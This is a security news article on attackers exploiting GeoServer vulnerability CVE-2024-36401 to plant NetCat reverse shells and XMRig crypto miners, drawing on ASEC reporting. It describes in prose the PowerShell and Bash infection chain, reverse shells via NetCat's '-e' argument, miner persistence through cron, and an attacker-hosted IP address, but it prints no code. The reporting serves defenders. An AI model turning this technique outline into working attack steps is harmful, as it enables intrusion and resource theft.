Cybercriminals Exploiting GeoServer RCE Vulnerability to Deploy Crypto Miners

A surge in cyberattacks leveraging the GeoServer Remote Code Execution (RCE) vulnerability (CVE-2024-36401) has been reported, with AhnLab Security Intelligence Center (ASEC) confirming active exploitation targeting both Windows and Linux environments.

GeoServer, a widely adopted open-source Geographic Information System (GIS) server written in Java, has become a high-value target for threat actors following the public disclosure of the RCE vulnerability in 2024.

Despite security advisories and public documentation, many GeoServer instances remain unpatched, creating fertile ground for malicious activity.

Twin Threats in South Korea and Beyond

Recent attack campaigns have been observed in South Korea, where cybercriminals have exploited unpatched GeoServer installations to execute PowerShell commands remotely and deploy NetCat and XMRig CoinMiner.

According to ASEC Report, these attacks begin with the delivery of malicious PowerShell scripts, such as “adminc.ps1,” that install NetCat a legitimate network utility often abused as a remote shell.

By leveraging NetCat with the “-e” argument, attackers establish reverse shells to control compromised systems remotely, facilitating further malicious activity including data exfiltration and lateral movement.

The campaign’s primary monetization method appears to be the deployment of the XMRig CoinMiner, a popular tool for illicit mining of Monero cryptocurrency.

Attackers use both PowerShell and Bash scripts, tailored depending on the target operating system, to silently install and configure XMRig on the victim’s machine.

On Windows systems, a specific PowerShell payload is executed, downloading additional malicious scripts from a hardcoded external server.

For compromised Linux environments, Bash scripts are employed to terminate competing miners, deploy the XMRig miner, and ensure persistence through cron job registration.

This enables attackers to maximize mining uptime, siphoning computational resources from compromised hosts.

Notably, the threat actor’s infrastructure utilizes a range of distribution URLs and configuration files, including links hosted at 182.218.82.14.

Analysis of these scripts shows they facilitate both the initial infection vector and subsequent stages of the attack, such as fetching miner configuration files or new payloads.

The crypto mining pool and wallet information embedded within the scripts all point toward an organized, profit-driven operation.

Attacks Reflect Broader Campaigns

References from security vendors, including Fortinet and Trend Micro, have highlighted that multiple strains of malware (such as GOREVERSE, SideWalk, Mirai, Condi, and CoinMiner) have exploited CVE-2024-36401 in the wild.

Attackers have demonstrated a willingness to target high-value governmental and enterprise environments, most notably through spear-phishing and automated scanning.

The infection chain in recent South Korean cases closely mirrors tactics used in previous global attacks, underscoring a coordinated and evolving threat landscape.

As long as vulnerable GeoServer instances remain exposed to the Internet, organizations will face continued risk of exploitation.

Once compromised, systems not only suffer performance degradation due to unauthorized cryptocurrency mining but also face the danger of data theft and subsequent malware deployment enabled by tools like NetCat.

Security experts emphasize the urgent need for patching vulnerable GeoServer installations and monitoring for indicators of compromise associated with these attack campaigns.

Indicator of Compromise (IOC)

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates